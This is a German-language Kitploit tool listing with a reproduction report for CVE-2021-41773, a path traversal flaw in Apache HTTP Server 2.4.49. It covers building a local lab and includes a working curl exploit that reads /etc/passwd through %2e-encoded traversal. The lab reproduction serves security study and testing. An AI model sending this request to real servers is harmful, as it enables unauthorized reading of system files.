Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41773-POC — Reproduktion der Path-Traversal-Sicherheitslücke in Apache HTTP Server 2.4.49 | Kitploit
Tools/GitHubGitHub/fxdyx-a/cve-2021-41773-poc
AufklärungSchwachstellenanalyseExploitationWebsicherheitPenetrationstests
GitHubfxdyx-a/cve-2021-41773-poc

CVE-2021-41773-POC

Reproduktion der Path-Traversal-Sicherheitslücke in Apache HTTP Server 2.4.49

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41773 Reproduktionsbericht der Schwachstelle

Schwachstellenübersicht

  • CVE-ID: CVE-2021-41773
  • Schwachstellenname: Apache HTTP Server Pfad-Traversal-Schwachstelle
  • Risikostufe: Hoch (CVSS 7.5)
  • Betroffene Version: Apache HTTP Server 2.4.49
  • Beschreibung: Der Apache HTTP Server 2.4.49 weist einen Implementierungsfehler in der Pfadnormalisierungsfunktion ap_normalize_path auf. Ein Angreifer kann durch das Erstellen spezieller Anfragen mit %2e-Kodierungen die Zugriffskontrollen umgehen und beliebige Dateien auf dem Webserver lesen.

Aufbau der Umgebung

  • Betriebssystem: Ubuntu 20.04 (VM)
  • Webserver: Apache httpd 2.4.49 (manuell kompiliert und installiert)
  • Testumgebung: Eigenständig laufend, hört auf Port 8080
  • Wichtige Konfigurationen:
    • Ändern Sie in <Directory /> das Require all denied zu Require all granted
    • Fügen Sie einen Alias /vuln hinzu, der auf /tmp/vuln_dir verweist, und legen Sie die Berechtigungen fest

Reproduktion der Schwachstelle

Angriffsbefehl

curl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

Screenshot des Angriffs

Lesen von /etc/passwd erfolgreich Lesen von /etc/passwd erfolgreich

Tool herunterladen